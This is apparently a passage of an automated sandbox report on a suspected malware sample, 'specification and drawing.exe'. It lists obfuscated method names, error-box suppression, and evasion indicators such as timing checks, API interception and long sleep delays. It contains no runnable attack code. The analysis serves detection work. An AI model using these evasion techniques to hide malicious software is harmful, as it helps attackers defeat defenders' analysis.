                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, ccvkXF55JJVAkRbIZiq.csHigh entropy of concatenated method names: 'HFF6XawHkT', 'trf6zSdP2x', 'gnBvaAwAGE', 'QH3v5dmE5G', 'IFIvoONjjC', 'ufcvVF1Xpm', 'Pdmv9HuSsH', 'w87vN5s7bg', 'f8LvFojpea', 'SwHvdDxAru'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, qWpum4n9pm2GhnPj8c.csHigh entropy of concatenated method names: 'hydpLNt88i', 'cHAp3I3ZHW', 'pRKpp6CFqp', 'NDOpvMxjS4', 'QwapOlmZ0F', 'qr9pQpfySQ', 'Dispose', 'DMpgFrg5nE', 'Qisgdk2ryZ', 'SrfgDTMC4A'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, yoeWtF99YePcuYKqj4.csHigh entropy of concatenated method names: 'T2Z5YODBbA', 'K335qqWbhE', 'R0J5ev3AMs', 'CG45uwrP00', 'hiK5LEfOQG', 'I4E5WB608k', 'XogGI8xJbj1kVi8dk8', 'KSBBeyNbQ0SqNBxtls', 'mDl55VsG3V', 'HbK5VbuaAD'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, QMQyG62SJ3EQdai9md.csHigh entropy of concatenated method names: 'AFG3ePJ3C4', 'DVy3ucCkOv', 'ToString', 'x0v3FikcQK', 'X063do76g6', 'zPA3DBDWw5', 'WnL3ZjMbIH', 'DDm3CyK8Q2', 'lGp3Yx77wm', 'Ljn3q8SC6D'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, u2s8fGoGVecARSbZsj.csHigh entropy of concatenated method names: 'mRLTBHbKb', 'ODfK7UIt0', 'N3P7rpdIr', 'yk6B7WEfm', 'Disl9HoWD', 'OjGyRE7Pa', 'Y9AyqtCBKejQJWKG3V', 'XJ22hUeRG09Gb2WrTP', 'RLJgpNOH3', 'dBi6IJTko'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, HQmhat5aSmtlWKU2EVV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mAX6MgTXbZ', 'dPY6wlc8V0', 'ytc6tZcUEE', 'DMq6jFexA5', 'M7y6rImW7t', 'HxP6csf9SD', 'eQO62naTA1'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, oR1TwPqxXE1yujic7I.csHigh entropy of concatenated method names: 'mWcVNsoQea', 'AtOVFJapeC', 'kyjVd8j4vt', 'ePOVDpwy10', 'hM6VZigXVK', 'quGVCJD9HC', 'M2rVYDPdkp', 'nxVVqgdXD0', 'VdYVSspXLc', 'JCLVeLlVOc'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, hODBbAxf33qWbhEBEP.csHigh entropy of concatenated method names: 'E41dj9vSwC', 'PfldrZKZQB', 'kAhdc2ginv', 'DrRd24JPU1', 'OALdhx0quV', 'm8Xd1a9yib', 'EogdnBwx4x', 'rJmdPI1lkR', 'UYKdk9pU5T', 'JoedXKAamu'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, alei22IFpaJWn2wvIn.csHigh entropy of concatenated method names: 'c4p5uxBZe34V4BxrbUd', 'RmBsuEB8u8hQ99wgaJ6', 'UFiCgMdr0e', 'jIXCpg13ao', 'mClC6JmPDO', 'zymLpRBcRHhbcYXewoa', 'TQBNM7BD7yWk7DeEKN7'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, Db4eOo1ZYyucxcLYQs.csHigh entropy of concatenated method names: 'UvL3Pi2qFT', 'm173XbTxrc', 'Px8ga1db6l', 'nmKg58JUE9', 'qBV3MWqCLV', 'OMT3wiprDT', 'YsI3tFODME', 'sdS3jtm1Eu', 'Wha3rouaof', 'DBZ3cscAQ6'
                      Source: 0.2.specification and drawing.exe.7130000.6.raw.unpack, OKQluEXLpruCwLCefN.csHigh entropy of concatenated method names: 'PKw6DuIXc8', 'iQS6Ze4W9e', 'zrW6CVoUsf', 'AEA6YlrLEZ', 'Mwg6p56lw5', 'kOo6q4mcRJ', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                      Source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: specification and drawing.exe PID: 6316, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: 9040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: A040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: A250000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeMemory allocated: B250000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E rdtsc 4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4589Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 670Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow / User API: threadDelayed 1820Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow / User API: threadDelayed 8153Jump to behavior
                      Source: C:\Users\user\Desktop\specification and drawing.exeAPI coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\wscript.exeAPI coverage: 2.7 %
                      Source: C:\Users\user\Desktop\specification and drawing.exe TID: 5260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep time: -922337203685477s >= -30000sJump to behavior
